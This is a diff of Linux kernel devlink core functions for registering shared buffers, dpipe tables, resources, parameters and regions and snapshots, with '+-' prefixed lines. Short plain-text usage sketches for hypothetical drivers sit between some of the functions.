+-	mutex_lock(&linecard->state_lock);
+-	linecard->nested_devlink = nested_devlink;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_nested_dl_set);
+-
+-int devl_sb_register(struct devlink *devlink, unsigned int sb_index,
+-		     u32 size, u16 ingress_pools_count,
+-		     u16 egress_pools_count, u16 ingress_tc_count,
+-		     u16 egress_tc_count)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	if (devlink_sb_index_exists(devlink, sb_index))
+-		return -EEXIST;
+-
+-	devlink_sb = kzalloc(sizeof(*devlink_sb), GFP_KERNEL);
+-	if (!devlink_sb)
+-		return -ENOMEM;
+-	devlink_sb->index = sb_index;
+-	devlink_sb->size = size;
+-	devlink_sb->ingress_pools_count = ingress_pools_count;
+-	devlink_sb->egress_pools_count = egress_pools_count;
+-	devlink_sb->ingress_tc_count = ingress_tc_count;
+-	devlink_sb->egress_tc_count = egress_tc_count;
+-	list_add_tail(&devlink_sb->list, &devlink->sb_list);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_sb_register);
+-
+-int devlink_sb_register(struct devlink *devlink, unsigned int sb_index,
+-			u32 size, u16 ingress_pools_count,
+-			u16 egress_pools_count, u16 ingress_tc_count,
+-			u16 egress_tc_count)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_sb_register(devlink, sb_index, size, ingress_pools_count,
+-			       egress_pools_count, ingress_tc_count,
+-			       egress_tc_count);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_sb_register);
+-
+-void devl_sb_unregister(struct devlink *devlink, unsigned int sb_index)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
+-	WARN_ON(!devlink_sb);
+-	list_del(&devlink_sb->list);
+-	kfree(devlink_sb);
+-}
+-EXPORT_SYMBOL_GPL(devl_sb_unregister);
+-
+-void devlink_sb_unregister(struct devlink *devlink, unsigned int sb_index)
+-{
+-	devl_lock(devlink);
+-	devl_sb_unregister(devlink, sb_index);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_sb_unregister);
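A driver with a single shared buffer registers it at init time (the size
and pool/TC counts here are hypothetical):

	err = devlink_sb_register(devlink, 0 /* sb_index */,
				  FOO_SB_SIZE_BYTES,
				  4, 4,		/* ingress/egress pools */
				  8, 8);	/* ingress/egress TCs */
	if (err)
		return err;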
+-
+-/**
+- * devl_dpipe_headers_register - register dpipe headers
+- *
+- * @devlink: devlink
+- * @dpipe_headers: dpipe header array
+- *
+- * Register the headers supported by hardware.
+- */
+-void devl_dpipe_headers_register(struct devlink *devlink,
+-				 struct devlink_dpipe_headers *dpipe_headers)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink->dpipe_headers = dpipe_headers;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_headers_register);
+-
+-/**
+- * devl_dpipe_headers_unregister - unregister dpipe headers
+- *
+- * @devlink: devlink
+- *
+- * Unregister the headers supported by hardware.
+- */
+-void devl_dpipe_headers_unregister(struct devlink *devlink)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink->dpipe_headers = NULL;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_headers_unregister);
+-
+-/**
+- *	devlink_dpipe_table_counter_enabled - check if counter allocation
+- *					      required
+- *	@devlink: devlink
+- *	@table_name: table name
+- *
+- *	Used by the driver to check if counter allocation is required.
+- *	After counter allocation is turned on, the table entries
+- *	are updated to include counter statistics.
+- *
+- *	From that point on, the driver must respect the counter
+- *	state so that each entry added to the table is added
+- *	with a counter.
+- */
+-bool devlink_dpipe_table_counter_enabled(struct devlink *devlink,
+-					 const char *table_name)
+-{
+-	struct devlink_dpipe_table *table;
+-	bool enabled;
+-
+-	rcu_read_lock();
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	enabled = false;
+-	if (table)
+-		enabled = table->counters_enabled;
+-	rcu_read_unlock();
+-	return enabled;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_table_counter_enabled);
+-
+-/**
+- * devl_dpipe_table_register - register dpipe table
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- * @table_ops: table ops
+- * @priv: priv
+- * @counter_control_extern: external control for counters
+- */
+-int devl_dpipe_table_register(struct devlink *devlink,
+-			      const char *table_name,
+-			      struct devlink_dpipe_table_ops *table_ops,
+-			      void *priv, bool counter_control_extern)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	if (WARN_ON(!table_ops->size_get))
+-		return -EINVAL;
+-
+-	if (devlink_dpipe_table_find(&devlink->dpipe_table_list, table_name,
+-				     devlink))
+-		return -EEXIST;
+-
+-	table = kzalloc(sizeof(*table), GFP_KERNEL);
+-	if (!table)
+-		return -ENOMEM;
+-
+-	table->name = table_name;
+-	table->table_ops = table_ops;
+-	table->priv = priv;
+-	table->counter_control_extern = counter_control_extern;
+-
+-	list_add_tail_rcu(&table->list, &devlink->dpipe_table_list);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_register);
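size_get is the only mandatory op; a minimal hypothetical registration
looks like:

	static u64 foo_host_table_size_get(void *priv)
	{
		struct foo *foo = priv;

		return foo->max_host_entries;
	}

	static struct devlink_dpipe_table_ops foo_host_table_ops = {
		.size_get = foo_host_table_size_get,
		/* dump and counter ops omitted from this sketch */
	};

	devl_lock(devlink);
	err = devl_dpipe_table_register(devlink, "foo_host_table",
					&foo_host_table_ops, foo, false);
	devl_unlock(devlink);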
+-
+-/**
+- * devl_dpipe_table_unregister - unregister dpipe table
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- */
+-void devl_dpipe_table_unregister(struct devlink *devlink,
+-				 const char *table_name)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return;
+-	list_del_rcu(&table->list);
+-	kfree_rcu(table, rcu);
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_unregister);
+-
+-/**
+- * devl_resource_register - devlink resource register
+- *
+- * @devlink: devlink
+- * @resource_name: resource's name
+- * @resource_size: resource's size
+- * @resource_id: resource's id
+- * @parent_resource_id: resource's parent id
+- * @size_params: size parameters
+- *
+- * Generic resources should reuse the same names across drivers.
+- * Please see the generic resources list at:
+- * Documentation/networking/devlink/devlink-resource.rst
+- */
+-int devl_resource_register(struct devlink *devlink,
+-			   const char *resource_name,
+-			   u64 resource_size,
+-			   u64 resource_id,
+-			   u64 parent_resource_id,
+-			   const struct devlink_resource_size_params *size_params)
+-{
+-	struct devlink_resource *resource;
+-	struct list_head *resource_list;
+-	bool top_hierarchy;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	top_hierarchy = parent_resource_id == DEVLINK_RESOURCE_ID_PARENT_TOP;
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (resource)
+-		return -EINVAL;
+-
+-	resource = kzalloc(sizeof(*resource), GFP_KERNEL);
+-	if (!resource)
+-		return -ENOMEM;
+-
+-	if (top_hierarchy) {
+-		resource_list = &devlink->resource_list;
+-	} else {
+-		struct devlink_resource *parent_resource;
+-
+-		parent_resource = devlink_resource_find(devlink, NULL,
+-							parent_resource_id);
+-		if (parent_resource) {
+-			resource_list = &parent_resource->resource_list;
+-			resource->parent = parent_resource;
+-		} else {
+-			kfree(resource);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	resource->name = resource_name;
+-	resource->size = resource_size;
+-	resource->size_new = resource_size;
+-	resource->id = resource_id;
+-	resource->size_valid = true;
+-	memcpy(&resource->size_params, size_params,
+-	       sizeof(resource->size_params));
+-	INIT_LIST_HEAD(&resource->resource_list);
+-	list_add_tail(&resource->list, resource_list);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_register);
+-
+-/**
+- *	devlink_resource_register - devlink resource register
+- *
+- *	@devlink: devlink
+- *	@resource_name: resource's name
+- *	@resource_size: resource's size
+- *	@resource_id: resource's id
+- *	@parent_resource_id: resource's parent id
+- *	@size_params: size parameters
+- *
+- *	Generic resources should reuse the same names across drivers.
+- *	Please see the generic resources list at:
+- *	Documentation/networking/devlink/devlink-resource.rst
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-int devlink_resource_register(struct devlink *devlink,
+-			      const char *resource_name,
+-			      u64 resource_size,
+-			      u64 resource_id,
+-			      u64 parent_resource_id,
+-			      const struct devlink_resource_size_params *size_params)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_resource_register(devlink, resource_name, resource_size,
+-				     resource_id, parent_resource_id, size_params);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_register);
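A sketch of a top-level resource registration (the FOO_* names and limits
are hypothetical):

	struct devlink_resource_size_params size_params;

	devlink_resource_size_params_init(&size_params, 0, FOO_FT_MAX_ENTRIES,
					  1, DEVLINK_RESOURCE_UNIT_ENTRY);
	err = devlink_resource_register(devlink, "ft_entries",
					FOO_FT_DFLT_ENTRIES, FOO_RESOURCE_FT,
					DEVLINK_RESOURCE_ID_PARENT_TOP,
					&size_params);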
+-
+-static void devlink_resource_unregister(struct devlink *devlink,
+-					struct devlink_resource *resource)
+-{
+-	struct devlink_resource *tmp, *child_resource;
+-
+-	list_for_each_entry_safe(child_resource, tmp, &resource->resource_list,
+-				 list) {
+-		devlink_resource_unregister(devlink, child_resource);
+-		list_del(&child_resource->list);
+-		kfree(child_resource);
+-	}
+-}
+-
+-/**
+- * devl_resources_unregister - free all resources
+- *
+- * @devlink: devlink
+- */
+-void devl_resources_unregister(struct devlink *devlink)
+-{
+-	struct devlink_resource *tmp, *child_resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	list_for_each_entry_safe(child_resource, tmp, &devlink->resource_list,
+-				 list) {
+-		devlink_resource_unregister(devlink, child_resource);
+-		list_del(&child_resource->list);
+-		kfree(child_resource);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devl_resources_unregister);
+-
+-/**
+- *	devlink_resources_unregister - free all resources
+- *
+- *	@devlink: devlink
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_resources_unregister(struct devlink *devlink)
+-{
+-	devl_lock(devlink);
+-	devl_resources_unregister(devlink);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resources_unregister);
+-
+-/**
+- * devl_resource_size_get - get and update size
+- *
+- * @devlink: devlink
+- * @resource_id: the requested resource id
+- * @p_resource_size: ptr to update
+- */
+-int devl_resource_size_get(struct devlink *devlink,
+-			   u64 resource_id,
+-			   u64 *p_resource_size)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (!resource)
+-		return -EINVAL;
+-	*p_resource_size = resource->size_new;
+-	resource->size = resource->size_new;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_size_get);
+-
+-/**
+- * devl_dpipe_table_resource_set - set the resource id
+- *
+- * @devlink: devlink
+- * @table_name: table name
+- * @resource_id: resource id
+- * @resource_units: number of resource's units consumed per table's entry
+- */
+-int devl_dpipe_table_resource_set(struct devlink *devlink,
+-				  const char *table_name, u64 resource_id,
+-				  u64 resource_units)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	table->resource_id = resource_id;
+-	table->resource_units = resource_units;
+-	table->resource_valid = true;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_table_resource_set);
+-
+-/**
+- * devl_resource_occ_get_register - register occupancy getter
+- *
+- * @devlink: devlink
+- * @resource_id: resource id
+- * @occ_get: occupancy getter callback
+- * @occ_get_priv: occupancy getter callback priv
+- */
+-void devl_resource_occ_get_register(struct devlink *devlink,
+-				    u64 resource_id,
+-				    devlink_resource_occ_get_t *occ_get,
+-				    void *occ_get_priv)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (WARN_ON(!resource))
+-		return;
+-	WARN_ON(resource->occ_get);
+-
+-	resource->occ_get = occ_get;
+-	resource->occ_get_priv = occ_get_priv;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_occ_get_register);
+-
+-/**
+- *	devlink_resource_occ_get_register - register occupancy getter
+- *
+- *	@devlink: devlink
+- *	@resource_id: resource id
+- *	@occ_get: occupancy getter callback
+- *	@occ_get_priv: occupancy getter callback priv
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_resource_occ_get_register(struct devlink *devlink,
+-				       u64 resource_id,
+-				       devlink_resource_occ_get_t *occ_get,
+-				       void *occ_get_priv)
+-{
+-	devl_lock(devlink);
+-	devl_resource_occ_get_register(devlink, resource_id,
+-				       occ_get, occ_get_priv);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_occ_get_register);
+-
+-/**
+- * devl_resource_occ_get_unregister - unregister occupancy getter
+- *
+- * @devlink: devlink
+- * @resource_id: resource id
+- */
+-void devl_resource_occ_get_unregister(struct devlink *devlink,
+-				      u64 resource_id)
+-{
+-	struct devlink_resource *resource;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (WARN_ON(!resource))
+-		return;
+-	WARN_ON(!resource->occ_get);
+-
+-	resource->occ_get = NULL;
+-	resource->occ_get_priv = NULL;
+-}
+-EXPORT_SYMBOL_GPL(devl_resource_occ_get_unregister);
+-
+-/**
+- *	devlink_resource_occ_get_unregister - unregister occupancy getter
+- *
+- *	@devlink: devlink
+- *	@resource_id: resource id
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_resource_occ_get_unregister(struct devlink *devlink,
+-					 u64 resource_id)
+-{
+-	devl_lock(devlink);
+-	devl_resource_occ_get_unregister(devlink, resource_id);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_resource_occ_get_unregister);
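The getter is a plain callback that receives the priv pointer registered
with it; a hypothetical pairing:

	static u64 foo_ft_occ_get(void *priv)
	{
		struct foo *foo = priv;

		return atomic64_read(&foo->ft_entries_in_use);
	}

	devlink_resource_occ_get_register(devlink, FOO_RESOURCE_FT,
					  foo_ft_occ_get, foo);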
+-
+-static int devlink_param_verify(const struct devlink_param *param)
+-{
+-	if (!param || !param->name || !param->supported_cmodes)
+-		return -EINVAL;
+-	if (param->generic)
+-		return devlink_param_generic_verify(param);
+-	else
+-		return devlink_param_driver_verify(param);
+-}
+-
+-/**
+- *	devlink_params_register - register configuration parameters
+- *
+- *	@devlink: devlink
+- *	@params: configuration parameters array
+- *	@params_count: number of parameters provided
+- *
+- *	Register the configuration parameters supported by the driver.
+- */
+-int devlink_params_register(struct devlink *devlink,
+-			    const struct devlink_param *params,
+-			    size_t params_count)
+-{
+-	const struct devlink_param *param = params;
+-	int i, err;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	for (i = 0; i < params_count; i++, param++) {
+-		err = devlink_param_register(devlink, param);
+-		if (err)
+-			goto rollback;
+-	}
+-	return 0;
+-
+-rollback:
+-	if (!i)
+-		return err;
+-
+-	for (param--; i > 0; i--, param--)
+-		devlink_param_unregister(devlink, param);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_params_register);
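A driverinit-only generic parameter takes no get/set callbacks, matching
the WARN_ON logic in devlink_param_register() below; a hypothetical array,
registered before devlink_register():

	static const struct devlink_param foo_params[] = {
		DEVLINK_PARAM_GENERIC(ENABLE_SRIOV,
				      BIT(DEVLINK_PARAM_CMODE_DRIVERINIT),
				      NULL, NULL, NULL),
	};

	err = devlink_params_register(devlink, foo_params,
				      ARRAY_SIZE(foo_params));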
+-
+-/**
+- *	devlink_params_unregister - unregister configuration parameters
+- *	@devlink: devlink
+- *	@params: configuration parameters to unregister
+- *	@params_count: number of parameters provided
+- */
+-void devlink_params_unregister(struct devlink *devlink,
+-			       const struct devlink_param *params,
+-			       size_t params_count)
+-{
+-	const struct devlink_param *param = params;
+-	int i;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	for (i = 0; i < params_count; i++, param++)
+-		devlink_param_unregister(devlink, param);
+-}
+-EXPORT_SYMBOL_GPL(devlink_params_unregister);
+-
+-/**
+- * devlink_param_register - register one configuration parameter
+- *
+- * @devlink: devlink
+- * @param: one configuration parameter
+- *
+- * Register the configuration parameter supported by the driver.
+- * Return: 0 on successful registration or an error code otherwise.
+- */
+-int devlink_param_register(struct devlink *devlink,
+-			   const struct devlink_param *param)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	WARN_ON(devlink_param_verify(param));
+-	WARN_ON(devlink_param_find_by_name(&devlink->param_list, param->name));
+-
+-	if (param->supported_cmodes == BIT(DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		WARN_ON(param->get || param->set);
+-	else
+-		WARN_ON(!param->get || !param->set);
+-
+-	param_item = kzalloc(sizeof(*param_item), GFP_KERNEL);
+-	if (!param_item)
+-		return -ENOMEM;
+-
+-	param_item->param = param;
+-
+-	list_add_tail(&param_item->list, &devlink->param_list);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_register);
+-
+-/**
+- * devlink_param_unregister - unregister one configuration parameter
+- * @devlink: devlink
+- * @param: configuration parameter to unregister
+- */
+-void devlink_param_unregister(struct devlink *devlink,
+-			      const struct devlink_param *param)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	param_item =
+-		devlink_param_find_by_name(&devlink->param_list, param->name);
+-	WARN_ON(!param_item);
+-	list_del(&param_item->list);
+-	kfree(param_item);
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_unregister);
+-
+-/**
+- *	devlink_param_driverinit_value_get - get configuration parameter
+- *					     value for driver initializing
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *	@init_val: value of parameter in driverinit configuration mode
+- *
+- *	This function should be used by the driver to get the driverinit
+- *	configuration for initialization after a reload command.
+- */
+-int devlink_param_driverinit_value_get(struct devlink *devlink, u32 param_id,
+-				       union devlink_param_value *init_val)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	if (!devlink_reload_supported(devlink->ops))
+-		return -EOPNOTSUPP;
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	if (!param_item->driverinit_value_valid ||
+-	    !devlink_param_cmode_is_supported(param_item->param,
+-					      DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		return -EOPNOTSUPP;
+-
+-	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
+-		strcpy(init_val->vstr, param_item->driverinit_value.vstr);
+-	else
+-		*init_val = param_item->driverinit_value;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_get);
+-
+-/**
+- *	devlink_param_driverinit_value_set - set value of configuration
+- *					     parameter for driverinit
+- *					     configuration mode
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *	@init_val: value of parameter to set for driverinit configuration mode
+- *
+- *	This function should be used by the driver to set the default
+- *	value of a parameter for the driverinit configuration mode.
+- */
+-int devlink_param_driverinit_value_set(struct devlink *devlink, u32 param_id,
+-				       union devlink_param_value init_val)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	if (!devlink_param_cmode_is_supported(param_item->param,
+-					      DEVLINK_PARAM_CMODE_DRIVERINIT))
+-		return -EOPNOTSUPP;
+-
+-	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
+-		strcpy(param_item->driverinit_value.vstr, init_val.vstr);
+-	else
+-		param_item->driverinit_value = init_val;
+-	param_item->driverinit_value_valid = true;
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_set);
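A sketch of the intended call flow for the pair above, assuming the ENABLE_SRIOV parameter from the registration sketched earlier. Per the ASSERT_DEVLINK_NOT_REGISTERED check, the default must be seeded before devlink_register(); the value is read back when (re)initializing after a devlink reload. The foo-> field is hypothetical:

	union devlink_param_value value;
	int err;

	/* at probe time, before devlink_register(): seed the default */
	value.vbool = false;
	devlink_param_driverinit_value_set(devlink,
					   DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
					   value);

	/* during (re)init after reload: consume the effective value */
	err = devlink_param_driverinit_value_get(devlink,
						 DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
						 &value);
	if (!err)
		foo->sriov_enabled = value.vbool;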
+-
+-/**
+- *	devlink_param_value_changed - notify devlink on a parameter's value
+- *				      change. Should be called by the driver
+- *				      right after the change.
+- *
+- *	@devlink: devlink
+- *	@param_id: parameter ID
+- *
+- *	This function should be used by the driver to notify devlink on value
+- *	change, excluding driverinit configuration mode.
+- *	For driverinit configuration mode driver should use the function
+- */
+-void devlink_param_value_changed(struct devlink *devlink, u32 param_id)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
+-	WARN_ON(!param_item);
+-
+-	devlink_param_notify(devlink, 0, param_item, DEVLINK_CMD_PARAM_NEW);
+-}
+-EXPORT_SYMBOL_GPL(devlink_param_value_changed);
+-
+-/**
+- * devl_region_create - create a new address region
+- *
+- * @devlink: devlink
+- * @ops: region operations and name
+- * @region_max_snapshots: Maximum supported number of snapshots for region
+- * @region_size: size of region
+- */
+-struct devlink_region *devl_region_create(struct devlink *devlink,
+-					  const struct devlink_region_ops *ops,
+-					  u32 region_max_snapshots,
+-					  u64 region_size)
+-{
+-	struct devlink_region *region;
+-
+-	devl_assert_locked(devlink);
+-
+-	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
+-		return ERR_PTR(-EINVAL);
+-
+-	if (devlink_region_get_by_name(devlink, ops->name))
+-		return ERR_PTR(-EEXIST);
+-
+-	region = kzalloc(sizeof(*region), GFP_KERNEL);
+-	if (!region)
+-		return ERR_PTR(-ENOMEM);
+-
+-	region->devlink = devlink;
+-	region->max_snapshots = region_max_snapshots;
+-	region->ops = ops;
+-	region->size = region_size;
+-	INIT_LIST_HEAD(&region->snapshot_list);
+-	mutex_init(&region->snapshot_lock);
+-	list_add_tail(&region->list, &devlink->region_list);
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	return region;
+-}
+-EXPORT_SYMBOL_GPL(devl_region_create);
+-
+-/**
+- *	devlink_region_create - create a new address region
+- *
+- *	@devlink: devlink
+- *	@ops: region operations and name
+- *	@region_max_snapshots: Maximum supported number of snapshots for region
+- *	@region_size: size of region
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-struct devlink_region *
+-devlink_region_create(struct devlink *devlink,
+-		      const struct devlink_region_ops *ops,
+-		      u32 region_max_snapshots, u64 region_size)
+-{
+-	struct devlink_region *region;
+-
+-	devl_lock(devlink);
+-	region = devl_region_create(devlink, ops, region_max_snapshots,
+-				    region_size);
+-	devl_unlock(devlink);
+-	return region;
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_create);
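A minimal sketch of the region API above. The region name, size macro and foo_* identifiers are hypothetical; kfree() is a valid destructor here because the snapshot buffers in the companion sketch below are kmalloc-based:

static const struct devlink_region_ops foo_fw_region_ops = {
	.name = "fw-core",		/* hypothetical region name */
	.destructor = kfree,		/* frees snapshot data when dropped */
};

	struct devlink_region *region;

	region = devlink_region_create(devlink, &foo_fw_region_ops,
				       8, FOO_FW_REGION_SIZE);
	if (IS_ERR(region))
		return PTR_ERR(region);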
+-
+-/**
+- *	devlink_port_region_create - create a new address region for a port
+- *
+- *	@port: devlink port
+- *	@ops: region operations and name
+- *	@region_max_snapshots: Maximum supported number of snapshots for region
+- *	@region_size: size of region
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-struct devlink_region *
+-devlink_port_region_create(struct devlink_port *port,
+-			   const struct devlink_port_region_ops *ops,
+-			   u32 region_max_snapshots, u64 region_size)
+-{
+-	struct devlink *devlink = port->devlink;
+-	struct devlink_region *region;
+-	int err = 0;
+-
+-	ASSERT_DEVLINK_PORT_INITIALIZED(port);
+-
+-	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
+-		return ERR_PTR(-EINVAL);
+-
+-	devl_lock(devlink);
+-
+-	if (devlink_port_region_get_by_name(port, ops->name)) {
+-		err = -EEXIST;
+-		goto unlock;
+-	}
+-
+-	region = kzalloc(sizeof(*region), GFP_KERNEL);
+-	if (!region) {
+-		err = -ENOMEM;
+-		goto unlock;
+-	}
+-
+-	region->devlink = devlink;
+-	region->port = port;
+-	region->max_snapshots = region_max_snapshots;
+-	region->port_ops = ops;
+-	region->size = region_size;
+-	INIT_LIST_HEAD(&region->snapshot_list);
+-	mutex_init(&region->snapshot_lock);
+-	list_add_tail(&region->list, &port->region_list);
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
+-
+-	devl_unlock(devlink);
+-	return region;
+-
+-unlock:
+-	devl_unlock(devlink);
+-	return ERR_PTR(err);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_region_create);
+-
+-/**
+- * devl_region_destroy - destroy address region
+- *
+- * @region: devlink region to destroy
+- */
+-void devl_region_destroy(struct devlink_region *region)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct devlink_snapshot *snapshot, *ts;
+-
+-	devl_assert_locked(devlink);
+-
+-	/* Free all snapshots of region */
+-	mutex_lock(&region->snapshot_lock);
+-	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
+-		devlink_region_snapshot_del(region, snapshot);
+-	mutex_unlock(&region->snapshot_lock);
+-
+-	list_del(&region->list);
+-	mutex_destroy(&region->snapshot_lock);
+-
+-	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
+-	kfree(region);
+-}
+-EXPORT_SYMBOL_GPL(devl_region_destroy);
+-
+-/**
+- *	devlink_region_destroy - destroy address region
+- *
+- *	@region: devlink region to destroy
+- *
+- *	Context: Takes and releases devlink->lock <mutex>.
+- */
+-void devlink_region_destroy(struct devlink_region *region)
+-{
+-	struct devlink *devlink = region->devlink;
+-
+-	devl_lock(devlink);
+-	devl_region_destroy(region);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_destroy);
+-
+-/**
+- *	devlink_region_snapshot_id_get - get snapshot ID
+- *
+- *	This function should be called when adding a new snapshot.
+- *	The driver should use the same id for multiple snapshots taken
+- *	on multiple regions at the same time/by the same trigger.
+- *
+- *	The caller of this function must use devlink_region_snapshot_id_put
+- *	when finished creating regions using this id.
+- *
+- *	Returns zero on success, or a negative error code on failure.
+- *
+- *	@devlink: devlink
+- *	@id: storage to return id
+- */
+-int devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
+-{
+-	return __devlink_region_snapshot_id_get(devlink, id);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_get);
+-
+-/**
+- *	devlink_region_snapshot_id_put - put snapshot ID reference
+- *
+- *	This should be called by a driver after finishing creating snapshots
+- *	with an id. Doing so ensures that the ID can later be released in the
+- *	event that all snapshots using it have been destroyed.
+- *
+- *	@devlink: devlink
+- *	@id: id to release reference on
+- */
+-void devlink_region_snapshot_id_put(struct devlink *devlink, u32 id)
+-{
+-	__devlink_snapshot_id_decrement(devlink, id);
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_put);
+-
+-/**
+- *	devlink_region_snapshot_create - create a new snapshot
+- *	This will add a new snapshot of a region. The snapshot
+- *	will be stored on the region struct and can be accessed
+- *	from devlink. This is useful for future analyses of snapshots.
+- *	Multiple snapshots can be created on a region.
+- *	The @snapshot_id should be obtained using the getter function.
+- *
+- *	@region: devlink region of the snapshot
+- *	@data: snapshot data
+- *	@snapshot_id: snapshot id to be created
+- */
+-int devlink_region_snapshot_create(struct devlink_region *region,
+-				   u8 *data, u32 snapshot_id)
+-{
+-	int err;
+-
+-	mutex_lock(&region->snapshot_lock);
+-	err = __devlink_region_snapshot_create(region, data, snapshot_id);
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_region_snapshot_create);
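Tying the three snapshot helpers above together, roughly how a driver captures one snapshot (a sketch; the source buffer and size are hypothetical). On success devlink owns the data buffer and later frees it through the region's destructor:

	u32 snapshot_id;
	u8 *data;
	int err;

	err = devlink_region_snapshot_id_get(devlink, &snapshot_id);
	if (err)
		return err;

	data = kmemdup(foo->fw_core_buf, FOO_FW_REGION_SIZE, GFP_KERNEL);
	if (data) {
		err = devlink_region_snapshot_create(region, data, snapshot_id);
		if (err)
			kfree(data);	/* devlink did not take ownership */
	}

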